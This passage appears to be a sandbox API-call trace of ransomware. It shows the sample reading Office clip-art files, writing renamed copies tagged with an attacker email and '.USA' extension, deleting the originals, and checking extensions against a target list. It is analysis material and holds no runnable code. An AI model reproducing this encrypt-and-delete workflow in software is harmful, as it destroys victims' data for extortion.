1 [0271.321] SetEndOfFile (hFile=0x388) returned 1 [0271.321] CloseHandle (hObject=0x388) returned 1 [0271.321] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.321] SetEndOfFile (hFile=0x394) returned 1 [0271.323] CloseHandle (hObject=0x394) returned 1 [0271.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.323] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf")) returned 1 [0271.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.323] lstrlenW (lpString=".doc") returned 4 [0271.323] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.323] lstrlenW (lpString=".docx") returned 5 [0271.323] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.323] lstrlenW (lpString=".pdf") returned 4 [0271.323] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.323] lstrlenW (lpString=".xls") returned 4 [0271.323] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.323] lstrlenW (lpString=".xlsx") returned 5 [0271.324] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.324] lstrlenW (lpString=".ppt") returned 4 [0271.324] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.324] lstrlenW (lpString=".zip") returned 4 [0271.324] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.324] lstrlenW (lpString=".rar") returned 4 [0271.324] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.324] lstrlenW (lpString=".bz2") returned 4 [0271.324] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.324] lstrlenW (lpString=".7z") returned 3 [0271.324] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.324] lstrlenW (lpString=".dbf") returned 4 [0271.324] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.324] lstrlenW (lpString=".1cd") returned 4 [0271.324] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.324] lstrlenW (lpString=".jpg") returned 4 [0271.324] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.324] lstrlenW (lpString=".doc") returned 4 [0271.324] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.324] lstrlenW (lpString=".docx") returned 5 [0271.324] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.324] lstrlenW (lpString=".pdf") returned 4 [0271.324] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.324] lstrlenW (lpString=".xls") returned 4 [0271.325] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.325] lstrlenW (lpString=".xlsx") returned 5 [0271.325] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.325] lstrlenW (lpString=".ppt") returned 4 [0271.325] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.325] lstrlenW (lpString=".zip") returned 4 [0271.325] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.325] lstrlenW (lpString=".rar") returned 4 [0271.325] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.325] lstrlenW (lpString=".bz2") returned 4 [0271.325] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.325] lstrlenW (lpString=".7z") returned 3 [0271.325] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.325] lstrlenW (lpString=".dbf") returned 4 [0271.325] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.325] lstrlenW (lpString=".1cd") returned 4 [0271.325] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 63 [0271.325] lstrlenW (lpString=".jpg") returned 4 [0271.325] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.326] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.326] lstrlenW (lpString="FD00428_.WMF") returned 12 [0271.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.326] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=4796) returned 1 [0271.326] CloseHandle (hObject=0x394) returned 1 [0271.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf")) returned 0x20 [0271.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.326] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.326] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.327] GetLastError () returned 0x0 [0271.327] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x12bc, lpOverlapped=0x0) returned 1 [0271.329] WriteFile (in: hFile=0x388, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x12c0, lpOverlapped=0x0) returned 1 [0271.330] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.330] WriteFile (in: hFile=0x388, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.330] SetEndOfFile (hFile=0x388) returned 1 [0271.330] CloseHandle (hObject=0x388) returned 1 [0271.330] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.330] SetEndOfFile (hFile=0x394) returned 1 [0271.337] CloseHandle (hObject=0x394) returned 1 [0271.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.338] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf")) returned 1 [0271.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.338] lstrlenW (lpString=".doc") returned 4 [0271.338] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.338] lstrlenW (lpString=".docx") returned 5 [0271.338] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.338] lstrlenW (lpString=".pdf") returned 4 [0271.338] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.338] lstrlenW (lpString=".xls") returned 4 [0271.338] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.338] lstrlenW (lpString=".xlsx") returned 5 [0271.338] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.338] lstrlenW (lpString=".ppt") returned 4 [0271.338] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.338] lstrlenW (lpString=".zip") returned 4 [0271.338] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.338] lstrlenW (lpString=".rar") returned 4 [0271.338] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.338] lstrlenW (lpString=".bz2") returned 4 [0271.338] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.338] lstrlenW (lpString=".7z") returned 3 [0271.339] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.339] lstrlenW (lpString=".dbf") returned 4 [0271.339] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.339] lstrlenW (lpString=".1cd") returned 4 [0271.339] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.339] lstrlenW (lpString=".jpg") returned 4 [0271.339] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.339] lstrlenW (lpString=".doc") returned 4 [0271.339] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.339] lstrlenW (lpString=".docx") returned 5 [0271.339] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.339] lstrlenW (lpString=".pdf") returned 4 [0271.339] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.339] lstrlenW (lpString=".xls") returned 4 [0271.339] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.339] lstrlenW (lpString=".xlsx") returned 5 [0271.339] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.339] lstrlenW (lpString=".ppt") returned 4 [0271.339] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.339] lstrlenW (lpString=".zip") returned 4 [0271.339] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.339] lstrlenW (lpString=".rar") returned 4 [0271.339] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.339] lstrlenW (lpString=".bz2") returned 4 [0271.340] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.340] lstrlenW (lpString=".7z") returned 3 [0271.340] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.340] lstrlenW (lpString=".dbf") returned 4 [0271.340] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.340] lstrlenW (lpString=".1cd") returned 4 [0271.340] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 63 [0271.340] lstrlenW (lpString=".jpg") returned 4 [0271.340] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.340] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.340] lstrlenW (lpString="FD00435_.WMF") returned 12 [0271.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.343] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2108) returned 1 [0271.343] CloseHandle (hObject=0x388) returned 1 [0271.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf")) returned 0x20 [0271.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.344] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.344] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.344] GetLastError () returned 0x0 [0271.344] ReadFile (in: hFile=0x388, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x83c, lpOverlapped=0x0) returned 1 [0271.420] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x840, lpOverlapped=0x0) returned 1 [0271.421] ReadFile (in: hFile=0x388, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.421] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.421] SetEndOfFile (hFile=0x394) returned 1 [0271.421] CloseHandle (hObject=0x394) returned 1 [0271.422] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.422] SetEndOfFile (hFile=0x388) returned 1 [0271.424] CloseHandle (hObject=0x388) returned 1 [0271.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.459] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf")) returned 1 [0271.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.485] lstrlenW (lpString=".doc") returned 4 [0271.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString=".docx") returned 5 [0271.485] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.485] lstrlenW (lpString=".pdf") returned 4 [0271.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString=".xls") returned 4 [0271.486] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.486] lstrlenW (lpString=".xlsx") returned 5 [0271.486] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.486] lstrlenW (lpString=".ppt") returned 4 [0271.486] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.486] lstrlenW (lpString=".zip") returned 4 [0271.486] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.486] lstrlenW (lpString=".rar") returned 4 [0271.486] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString=".bz2") returned 4 [0271.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString=".7z") returned 3 [0271.486] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.486] lstrlenW (lpString=".dbf") returned 4 [0271.486] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.486] lstrlenW (lpString=".1cd") returned 4 [0271.486] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.486] lstrlenW (lpString=".jpg") returned 4 [0271.486] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.486] lstrlenW (lpString=".doc") returned 4 [0271.486] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString=".docx") returned 5 [0271.486] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.487] lstrlenW (lpString=".pdf") returned 4 [0271.487] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.487] lstrlenW (lpString=".xls") returned 4 [0271.487] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.487] lstrlenW (lpString=".xlsx") returned 5 [0271.487] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.487] lstrlenW (lpString=".ppt") returned 4 [0271.487] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.487] lstrlenW (lpString=".zip") returned 4 [0271.487] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.487] lstrlenW (lpString=".rar") returned 4 [0271.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.487] lstrlenW (lpString=".bz2") returned 4 [0271.487] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.487] lstrlenW (lpString=".7z") returned 3 [0271.487] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.487] lstrlenW (lpString=".dbf") returned 4 [0271.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.487] lstrlenW (lpString=".1cd") returned 4 [0271.487] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63 [0271.487] lstrlenW (lpString=".jpg") returned 4 [0271.487] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.487] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.487] lstrlenW (lpString="FD00779_.WMF") returned 12 [0271.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.532] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=9010) returned 1 [0271.532] CloseHandle (hObject=0x380) returned 1 [0271.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf")) returned 0x20 [0271.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0271.582] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.582] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.583] GetLastError () returned 0x0 [0271.583] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x2332, lpOverlapped=0x0) returned 1 [0271.606] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x2340, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x2340, lpOverlapped=0x0) returned 1 [0271.607] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.607] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.607] SetEndOfFile (hFile=0x328) returned 1 [0271.607] CloseHandle (hObject=0x328) returned 1 [0271.607] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.607] SetEndOfFile (hFile=0x2ac) returned 1 [0271.609] CloseHandle (hObject=0x2ac) returned 1 [0271.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.614] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf")) returned 1 [0271.640] lstrlenW (lpString="C:\\Program 